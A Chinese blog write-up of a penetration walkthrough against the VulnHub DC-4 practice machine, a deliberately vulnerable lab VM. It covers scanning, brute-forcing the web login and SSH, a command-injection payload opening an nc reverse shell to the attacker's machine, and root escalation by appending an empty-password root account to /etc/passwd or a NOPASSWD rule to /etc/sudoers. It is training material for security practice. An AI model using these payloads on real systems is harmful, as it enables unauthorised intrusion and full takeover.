VulnHub系列 DC-4靶机 渗透详细过程 | 红队打靶

2024-04-18 04:20

本文主要是介绍VulnHub系列 DC-4靶机 渗透详细过程 | 红队打靶,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

VulnHub系列 DC-4靶机详细渗透测试过程

目录

  • VulnHub系列 DC-4靶机详细渗透测试过程
    • 一、将靶机导入到虚拟机当中
    • 二、渗透流程
      • 主机发现
      • 端口扫描
      • Web渗透
        • 暴力破解
        • 命令执行
        • 反弹shell
        • SSH暴力破解
        • 提权

一、将靶机导入到虚拟机当中

靶机地址:

https://download.vulnhub.com/dc/DC-4.zip

image-20240416231351749

二、渗透流程

主机发现

使用arp-scan命令或者nmap命令进行主机发现

image-20240416232834564

端口扫描

nmap -p- 192.168.43.27

image-20240416233010321

开放了22端口和80端口,可以再扫一下服务

nmap -p80,22 -sV -A 192.168.43.27

image-20240416233100055

识别一下web服务,看有什么信息

whatweb http://192.168.43.27

image-20240416233151791

并没有什么有价值的东西可利用,接下来访问Web界面

Web渗透

暴力破解

来到web界面,发现为登录界面,根据页面提示为管理员登录,但是通过简单信息收集并没有什么有效的信息,那么直接进行弱口令暴力破解

image-20240416234142112

image-20240416234241987

输入用户名admin,密码随意,抓取登录数据包,进行暴力破解

image-20240416234626837

发送请求,等待即可,根据响应大小判断得到结果,密码为happy

image-20240416234912020

命令执行

回到后台,等登录即可,进入后台,发现有命令工具,进入查看,点击run,发现执行了ls -l命令得回显内容,抓包看一下

image-20240416235311864

image-20240416235358848

image-20240416235846066

尝试将命令换成其他命令,如whoami,观察是否回显,直接可反弹shell

成功回显,接下来进行反弹shell操作,通过nc反弹

反弹shell

image-20240416235928239

radio=nc+-e+/bin/bash+192.168.43.105+8888&submit=%E8%B7%91

image-20240417000050642

kail端开启nc监听,成功接收到shell

image-20240417000141433

获取一个稳定shell

python -c "import pty;pty.spawn('/bin/bash')"

image-20240417000227434

观察当前目录下没有什么可用可看的文件,回答家目录查看一下,有无可用的信息

SSH暴力破解

到/home目录下发现有三个用户的家目录,那么我们依次进入,发现只有jim的家目录不为空,其他两个家目录都为空

image-20240417000322478

/home/jim目录下有三个文件,分别查看一下

image-20240417000517014

image-20240417000933407

通过test.sh脚本的提示信息,再加上查看发现的backups目录当中有密码信息,通过我们得到的三个用户名信息,再加上这个密码信息,可以尝试ssh爆破登录,观察是否可成功爆破出ssh用户的登录密码

先将获取的用户名和密码分别保存到文本文件当中,接下来进行爆破

hydra -L user.txt -P passwd.txt ssh://192.168.43.27

image-20240417000706852

通过ssh爆破,成功爆破出jim的ssh登录密码,接下来我们以用户名jim远程登录到靶机当中,进行下一步的操作

image-20240417001448887

远程登录

image-20240417001509925

查找一下目录,看有无重要信息

通过仔细观察我们发现有一个邮件,我们查看一下

image-20240417003158735

image-20240417001659032

去往此目录,查看jim文件得内容信息,发现charles发来的邮件,并有连接密码

image-20240417001727165

得到charles的ssh远程登录密码,进行远程登录操作

image-20240417001832760

然后我们再次通过charles用户进行远程登录,成功登录,发现也有邮件,查看一下,并无有用的信息

image-20240417002103968

image-20240417002140887

提权

接下来进行提权,提权三步走

//查找suid权限的有无可利用
find / -perm -u=s -type f 2>/dev/null

image-20240417002430209

image-20240417003305131

su和sudo可利用一下,但是均没成功

image-20240417002526943

image-20240417003326097

//列出目前用户可执行与无法执行的指令;
sudo -l 查看

image-20240417003432747

发现在charles当中的sudo -l命令当中存在以root权限执行的命令

image-20240417003418001

查看此命令帮助,如何使用

teehee --help

image-20240417003837462

翻译:我们使用-a参数

image-20240417003927416

那么接下来我们可以直接向/etc/passwd 文件当中写入,查看一下/etc/passwd文件信息

image-20240417004034359

//空密码,直接追加到/etc/passwd
echo "admin::0:0:admin:/root:/bin/bash" | sudo teehee -a /etc/passwd或 修改charles权限,给予"为所欲为"权限
echo "charles ALL=(ALL:ALL)NOPASSWD:ALL" | sudo teehee -a /etc/sudoers"

image-20240417004126373

image-20240417004138878

直接切换admin用户,发现charles无法切换,换jim用户切换成功,成功提权

su - admin

image-20240417004259456

jim用户切换成功:

成功提权,通关

image-20240417004242266

文章不妥之处,欢迎批评指正!

这篇关于VulnHub系列 DC-4靶机 渗透详细过程 | 红队打靶的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/913747

相关文章

JSON Web Token在登陆中的使用过程

《JSONWebToken在登陆中的使用过程》:本文主要介绍JSONWebToken在登陆中的使用过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录JWT 介绍微服务架构中的 JWT 使用结合微服务网关的 JWT 验证1. 用户登录,生成 JWT2. 自定义过滤

Java使用Curator进行ZooKeeper操作的详细教程

《Java使用Curator进行ZooKeeper操作的详细教程》ApacheCurator是一个基于ZooKeeper的Java客户端库,它极大地简化了使用ZooKeeper的开发工作,在分布式系统... 目录1、简述2、核心功能2.1 CuratorFramework2.2 Recipes3、示例实践3

java中使用POI生成Excel并导出过程

《java中使用POI生成Excel并导出过程》:本文主要介绍java中使用POI生成Excel并导出过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录需求说明及实现方式需求完成通用代码版本1版本2结果展示type参数为atype参数为b总结注:本文章中代码均为

通过Docker Compose部署MySQL的详细教程

《通过DockerCompose部署MySQL的详细教程》DockerCompose作为Docker官方的容器编排工具,为MySQL数据库部署带来了显著优势,下面小编就来为大家详细介绍一... 目录一、docker Compose 部署 mysql 的优势二、环境准备与基础配置2.1 项目目录结构2.2 基

SpringCloud之LoadBalancer负载均衡服务调用过程

《SpringCloud之LoadBalancer负载均衡服务调用过程》:本文主要介绍SpringCloud之LoadBalancer负载均衡服务调用过程,具有很好的参考价值,希望对大家有所帮助,... 目录前言一、LoadBalancer是什么?二、使用步骤1、启动consul2、客户端加入依赖3、以服务

Oracle存储过程里操作BLOB的字节数据的办法

《Oracle存储过程里操作BLOB的字节数据的办法》该篇文章介绍了如何在Oracle存储过程中操作BLOB的字节数据,作者研究了如何获取BLOB的字节长度、如何使用DBMS_LOB包进行BLOB操作... 目录一、缘由二、办法2.1 基本操作2.2 DBMS_LOB包2.3 字节级操作与RAW数据类型2.

Linux系统中配置静态IP地址的详细步骤

《Linux系统中配置静态IP地址的详细步骤》本文详细介绍了在Linux系统中配置静态IP地址的五个步骤,包括打开终端、编辑网络配置文件、配置IP地址、保存并重启网络服务,这对于系统管理员和新手都极具... 目录步骤一:打开终端步骤二:编辑网络配置文件步骤三:配置静态IP地址步骤四:保存并关闭文件步骤五:重

Centos环境下Tomcat虚拟主机配置详细教程

《Centos环境下Tomcat虚拟主机配置详细教程》这篇文章主要讲的是在CentOS系统上,如何一步步配置Tomcat的虚拟主机,内容很简单,从目录准备到配置文件修改,再到重启和测试,手把手带你搞定... 目录1. 准备虚拟主机的目录和内容创建目录添加测试文件2. 修改 Tomcat 的 server.X

C++快速排序超详细讲解

《C++快速排序超详细讲解》快速排序是一种高效的排序算法,通过分治法将数组划分为两部分,递归排序,直到整个数组有序,通过代码解析和示例,详细解释了快速排序的工作原理和实现过程,需要的朋友可以参考下... 目录一、快速排序原理二、快速排序标准代码三、代码解析四、使用while循环的快速排序1.代码代码1.由快

Spring Boot拦截器Interceptor与过滤器Filter详细教程(示例详解)

《SpringBoot拦截器Interceptor与过滤器Filter详细教程(示例详解)》本文详细介绍了SpringBoot中的拦截器(Interceptor)和过滤器(Filter),包括它们的... 目录Spring Boot拦截器(Interceptor)与过滤器(Filter)详细教程1. 概述1